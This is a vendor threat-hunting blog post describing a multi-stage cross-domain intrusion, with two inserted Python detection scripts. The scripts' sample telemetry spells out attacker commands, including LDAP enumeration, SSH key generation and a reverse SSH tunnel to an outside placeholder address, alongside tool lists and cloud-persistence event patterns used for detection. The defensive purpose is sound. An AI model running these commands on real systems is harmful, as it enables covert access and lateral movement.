Intelligence-Led Threat Hunting: The Key to Fighting Cross-Domain Attacks

Cross-domain attacks have become a defining challenge in modern cybersecurity, with adversaries exploiting gaps across endpoints, identity systems, and cloud environments to achieve their objectives. These sophisticated attacks use stealthy, malware-free techniques and legitimate tools, making them exceptionally difficult to detect and disrupt. 

As adversaries grow faster and more resourceful, and data infrastructures become more complex, organizations are at greater risk of blind spots created by disconnected defenses. Addressing this complexity requires a proactive approach that both uncovers threats in real time and connects the dots across the entire attack chain. This is where intelligence-led threat hunting becomes a game-changer.

One of the most notorious cross-domain adversaries is SCATTERED SPIDER. This financially motivated eCrime group targets Fortune 500 companies with adaptive and high-impact attack strategies, including identity abuse and cloud exploitation. They compromise IT and security personnel accounts to access tools and resources for lateral movement and deeper access. SCATTERED SPIDER, an adversary that is known for executing cloud-focused intrusions, uses spearphishing, policy modifications, and password manager access to infiltrate and exploit cloud environments. By penetrating the cloud control plane, SCATTERED SPIDER gains exponentially broader access, enabling seamless pivots across identity, cloud, and endpoint domains to maximize impact.

Read more about the rise of cross-domain attacks in this recent blog post.

A recent technical case study highlights a targeted attack on a pharmaceutical company using a highly coordinated cross-domain strategy exploiting compromised identities, cloud control planes, and lateral movement between endpoints and clouds. This underscores the critical need for full visibility across domains and intelligence-led threat hunting to detect and disrupt sophisticated cross-domain adversaries. 

Here, we break down this attack step-by-step to illustrate how cross-domain attacks unfold, where adversaries can gain an advantage, and how organizations can adjust their defenses.

Case Study Deep Dive

Figure 1. Attack path of a multi-stage intrusion across identity, endpoint, and cloud

1. Initial Entry and Exploitation

In the first stage of this attack, the adversary set up a command-and-control (C2-1 in Figure 1) infrastructure to launch their attack. They targeted a Linux Tomcat server, exploiting a known vulnerability to gain root access. Once inside, they conducted reconnaissance using standard tools like LDAP search to enumerate network shares and identify additional systems for lateral movement. This reconnaissance yielded additional credentials, enabling lateral movement across the environment. This phase highlights the risk of leaving critical vulnerabilities exposed, as adversaries can exploit them to infiltrate servers running essential services.

2. Lateral Movement and Identity Exploitation

After gaining initial access, the adversary moved laterally through the network using compromised credentials. They transitioned from the Linux Tomcat server to a Windows system, expanding their reach. To maintain covert communication, they generated SSH keys to set up SSH tunnels. Additionally, they targeted the System Security Services to harvest more credentials and gather information on the organization’s cloud infrastructure, enabling deeper access. CrowdStrike Falcon® Identity Protection detected these actions, even as the adversary operated from unmanaged boxes.
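The first two stages leave traces in endpoint process telemetry: directory enumeration launched from a web-server service account, key generation by that same account, and ssh invoked with forwarding options. The hunt logic below is an added example written for this post, not CrowdStrike or Falcon code; the event records, hostnames, user names, command lines and the list of service accounts are constructed, and the shape of a process-start record is an assumption about what an EDR or auditd pipeline would emit.

```python
import os
import shlex

# Constructed sample telemetry: one record per process start. Hosts, users,
# parents and command lines are invented for the example.
SAMPLE_EVENTS = [
    {"host": "web-01", "user": "tomcat", "parent": "java",
     "cmdline": "ldapsearch -x -H ldap://dc01.corp.example -b dc=corp,dc=example (objectClass=computer)"},
    {"host": "web-01", "user": "tomcat", "parent": "bash",
     "cmdline": "ssh-keygen -t ed25519 -f /tmp/.k -N ''"},
    {"host": "web-01", "user": "tomcat", "parent": "bash",
     "cmdline": "ssh -fN -i /tmp/.k -R 2222:localhost:22 user@203.0.113.10"},
    {"host": "jump-01", "user": "ops", "parent": "bash",
     "cmdline": "ssh -L 5432:db01:5432 ops@db01"},
    {"host": "web-01", "user": "tomcat", "parent": "java",
     "cmdline": "/usr/bin/java -jar app.jar"},
]

# Assumed set of accounts that run services and should never drive interactive tooling.
SERVICE_ACCOUNTS = {"tomcat", "www-data", "apache", "nginx"}
# Directory and share enumeration tools worth flagging when run by a service account.
RECON_TOOLS = {"ldapsearch", "smbclient", "nmap"}
# OpenSSH single-letter options that create a forward or tunnel (-R, -L, -D, -w).
TUNNEL_OPTION_LETTERS = set("RLDw")


def _argv(cmdline):
    """Split a command line the way a POSIX shell would; fall back on whitespace."""
    try:
        return shlex.split(cmdline)
    except ValueError:
        return cmdline.split()


def _tunnel_options(argv):
    """Return the tunnel-related option letters present in an ssh argv.

    Clustered options such as '-fNR' are handled by inspecting every letter
    of each single-dash token.
    """
    found = set()
    for tok in argv[1:]:
        if tok.startswith("-") and not tok.startswith("--"):
            found |= set(tok[1:]) & TUNNEL_OPTION_LETTERS
    return found


def classify(event):
    """Return the rule names that fire for one process-start record."""
    argv = _argv(event["cmdline"])
    if not argv:
        return []
    exe = os.path.basename(argv[0])
    from_service_account = event["user"] in SERVICE_ACCOUNTS
    findings = []
    if exe in RECON_TOOLS and from_service_account:
        findings.append("recon_from_service_account")
    if exe == "ssh-keygen" and from_service_account:
        findings.append("ssh_keygen_by_service_account")
    if exe == "ssh":
        opts = _tunnel_options(argv)
        if opts:
            findings.append("ssh_tunnel:" + "".join(sorted(opts)))
    return findings


def hunt(events):
    """Run every rule over the telemetry and return one finding per hit."""
    results = []
    for ev in events:
        for rule in classify(ev):
            results.append({
                "host": ev["host"],
                "user": ev["user"],
                "rule": rule,
                # A tunnel from an administrator may be legitimate; the same
                # activity from a web-server account is not.
                "severity": "high" if ev["user"] in SERVICE_ACCOUNTS else "medium",
            })
    return results


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Over the sample, the three tomcat events on web-01 produce high-severity findings and the administrator's port forward on jump-01 a medium one, which is the triage split a hunter wants: the service-account cluster on a single host is the lead to pull on first.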

3. Privileges and Administrator Access

The adversary compromised accounts with elevated privileges to gain administrative access. The permissions associated with these accounts allowed them to escalate the attack while avoiding detection. This phase illustrates the complexity of privileged account attacks, where admin access is exploited to maintain and expand footholds in compromised networks.

4. Second Stage and Cloud Targeting

To avoid being traced back to their original infrastructure, the adversary set up another command-and-control infrastructure (C2-2) to target the victim’s cloud environment. If one C2 infrastructure was detected, the other remained functional. Using access to Services Systems Manager (SSM), they focused on cloud service instances, bypassing endpoint protections to query sensitive data directly from the control plane. Rather than attacking Windows or Linux instances with installed endpoint detection and response (EDR) agents, the adversary manipulated the control plane to issue commands against cloud service hosts without direct interaction. By exploiting cloud security blind spots, they were able to extract sensitive data, such as intellectual property, without triggering endpoint detection alerts.

5. Persistence and Further Expansion

To ensure persistence, the adversary created additional accounts using SSM and spun up a new cloud service Windows instance. This instance acted as a “break glass” mechanism, providing a fallback in case existing access was lost. This tactic is particularly insidious, as a single instance running quietly in the background often goes unnoticed unless it impacts performance. By blending into normal cloud activity, the adversary maintained long-term access without detection.
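Stages 4 and 5 play out entirely in the cloud control plane, so the evidence is in the management API audit trail rather than on any instance: commands issued through SSM, new accounts created, and a fresh instance launched by the same principal within a short window. The correlation below is an added example for this post, not CrowdStrike or Falcon code; the records are constructed CloudTrail-style entries with invented principals, IPs and instance IDs, and the per-principal baseline of known source addresses is an assumption standing in for whatever history a hunting platform would hold.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed audit records reduced to the fields the rules need.
# Principal ARNs, addresses and instance IDs are invented placeholders.
SAMPLE_TRAIL = [
    {"time": "2024-05-01T09:30:00Z", "principal": "arn:aws:iam::111122223333:user/cloud-admin",
     "source_ip": "203.0.113.50", "event": "ssm:SendCommand",
     "params": {"DocumentName": "AWS-RunShellScript", "InstanceIds": ["i-0bbb222"]}},
    {"time": "2024-05-01T10:00:00Z", "principal": "arn:aws:iam::111122223333:user/svc-deploy",
     "source_ip": "198.51.100.7", "event": "ssm:SendCommand",
     "params": {"DocumentName": "AWS-RunPowerShellScript", "InstanceIds": ["i-0aaa111"]}},
    {"time": "2024-05-01T10:20:00Z", "principal": "arn:aws:iam::111122223333:user/svc-deploy",
     "source_ip": "198.51.100.7", "event": "iam:CreateUser",
     "params": {"UserName": "backup-svc"}},
    {"time": "2024-05-01T10:45:00Z", "principal": "arn:aws:iam::111122223333:user/svc-deploy",
     "source_ip": "198.51.100.7", "event": "ec2:RunInstances",
     "params": {"ImageId": "ami-windows-placeholder", "InstanceType": "t3.medium"}},
    {"time": "2024-05-01T11:00:00Z", "principal": "arn:aws:iam::111122223333:user/cloud-admin",
     "source_ip": "203.0.113.51", "event": "ec2:RunInstances",
     "params": {"ImageId": "ami-linux-placeholder", "InstanceType": "t3.small"}},
]

# Assumed baseline: source addresses each principal has used before.
BASELINE_SOURCE_IPS = {
    "arn:aws:iam::111122223333:user/svc-deploy": {"203.0.113.50"},
    "arn:aws:iam::111122223333:user/cloud-admin": {"203.0.113.50", "203.0.113.51"},
}

# The three stages of the control-plane pivot described in the case study.
CHAIN = {
    "command_execution": {"ssm:SendCommand", "ssm:StartSession"},
    "persistence_identity": {"iam:CreateUser", "iam:CreateAccessKey", "iam:CreateLoginProfile"},
    "persistence_compute": {"ec2:RunInstances"},
}


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def flag_new_source(events, baseline):
    """Command execution through the control plane from an address the principal never used."""
    alerts = []
    for ev in events:
        if ev["event"] in CHAIN["command_execution"]:
            if ev["source_ip"] not in baseline.get(ev["principal"], set()):
                alerts.append({"rule": "ssm_command_from_new_source", "principal": ev["principal"],
                               "time": ev["time"], "source_ip": ev["source_ip"]})
    return alerts


def flag_pivot_chains(events, window=timedelta(hours=2)):
    """Same principal completes all three chain stages within the window, in order."""
    by_principal = defaultdict(list)
    for ev in sorted(events, key=lambda e: _ts(e["time"])):
        by_principal[ev["principal"]].append(ev)
    alerts = []
    for principal, evs in by_principal.items():
        for i, start in enumerate(evs):
            if start["event"] not in CHAIN["command_execution"]:
                continue
            stages = {"command_execution": start["event"]}
            for later in evs[i + 1:]:
                if _ts(later["time"]) - _ts(start["time"]) > window:
                    break
                for stage, names in CHAIN.items():
                    if later["event"] in names and stage not in stages:
                        stages[stage] = later["event"]
            if len(stages) == len(CHAIN):
                alerts.append({"rule": "control_plane_pivot_chain", "principal": principal,
                               "start": start["time"], "events": stages})
                break  # one alert per principal is enough to open a case
    return alerts


def hunt(events, baseline=BASELINE_SOURCE_IPS):
    return flag_new_source(events, baseline) + flag_pivot_chains(events)


if __name__ == "__main__":
    for alert in hunt(SAMPLE_TRAIL):
        print(alert)
```

Neither rule fires on cloud-admin: the SendCommand comes from a known address and the later RunInstances has no identity-persistence step beside it. svc-deploy trips both, and the chain alert carries the three events a responder needs to confirm the new user and the "break glass" instance from stage 5.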

While monitoring the environment, CrowdStrike OverWatch threat hunters observed suspicious activities in real time. Once there was enough evidence confirming an intrusion, CrowdStrike immediately alerted the customer and advised on countermeasures to stop the adversary in their tracks. CrowdStrike connected the dots, revealing how the adversary gained credentials, moved through endpoints and clouds, and exploited the control plane. Continuous hunting and cross-domain correlation of malicious activities were key to understanding the adversary’s full scope and stopping the breach.

Turning Insight into Action with Intelligence-Led Defense

Threat hunting and threat intelligence are critical to stay ahead of modern cross-domain attacks, such as the incident described here. Real-time intelligence provides the insights needed to uncover hidden threats early, while proactive threat hunting, such as CrowdStrike Falcon® Adversary OverWatch, delivers 24/7 monitoring to analyze telemetry, identify abnormal patterns, and leverage adversary tradecraft knowledge to detect and stop threats.

By integrating advanced threat intelligence with proactive hunting in a unified security platform, organizations can detect and disrupt attacks faster, reduce response times, and prevent widespread damage. As demonstrated in this case study, this unified, intelligence-driven approach is the key to staying one step ahead of even the most sophisticated adversaries.

Additional Resources

CrowdStrike 2025 Global Threat Report

Get your copy of the must-read cybersecurity report of the year.